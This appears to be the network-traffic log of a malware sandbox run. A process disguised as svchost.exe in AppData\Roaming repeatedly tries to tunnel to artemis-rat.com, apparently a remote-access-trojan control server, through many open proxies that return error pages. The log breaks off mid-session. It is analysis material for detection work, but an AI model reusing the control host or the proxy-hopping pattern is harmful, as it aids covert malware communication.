Mar 9, 2024 13:14:33.931452036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3130	192.168.2.5	60032	172.67.219.60	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.945254087 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.101953983 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3131	192.168.2.5	59982	193.84.89.202	8443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.957385063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3132	192.168.2.5	58417	140.238.198.171	4455	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.971328974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.146054983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3133	192.168.2.5	60064	192.154.246.96	9000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.020340919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3134	192.168.2.5	59996	119.23.148.173	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.050287008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3135	192.168.2.5	60027	23.137.248.197	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.124748945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3136	192.168.2.5	60074	94.131.59.241	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.131006002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.351804018 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3670 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-seri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3137	192.168.2.5	60010	195.87.217.75	3389	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.131100893 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3138	192.168.2.5	60030	161.35.83.251	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.131156921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.833652020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.833662033 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.646342993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3139	192.168.2.5	60042	185.100.233.101	41138	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.131999016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.424859047 CET	226	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Length: 101 Content-Type: text/plain; charset=utf-8 Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3140	192.168.2.5	60025	94.30.152.172	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.132242918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.468419075 CET	310	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3141	192.168.2.5	60011	149.28.141.180	65201	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.132258892 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3142	192.168.2.5	60035	218.252.244.126	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.132801056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3143	192.168.2.5	60039	8.210.80.191	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.150515079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3144	192.168.2.5	60008	167.86.69.142	45364	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.150645971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.942667961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3145	192.168.2.5	60036	216.9.224.113	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.156029940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3146	192.168.2.5	60133	172.67.181.126	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.156075001 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.310561895 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3147	192.168.2.5	59800	125.227.225.157	3389	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.156092882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3148	192.168.2.5	60033	217.23.11.194	32708	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.172244072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.470671892 CET	226	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Length: 101 Content-Type: text/plain; charset=utf-8 Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Mar 9, 2024 13:14:35.307164907 CET	226	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Length: 101 Content-Type: text/plain; charset=utf-8 Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3149	192.168.2.5	60049	47.100.207.117	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.175606966 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.510691881 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3150	192.168.2.5	60060	176.119.25.13	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.180917025 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.942497969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.942951918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3151	192.168.2.5	60057	103.166.141.74	20074	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.186043024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3152	192.168.2.5	60072	8.211.4.215	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.194382906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.880242109 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3153	192.168.2.5	58694	51.79.87.144	30464	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
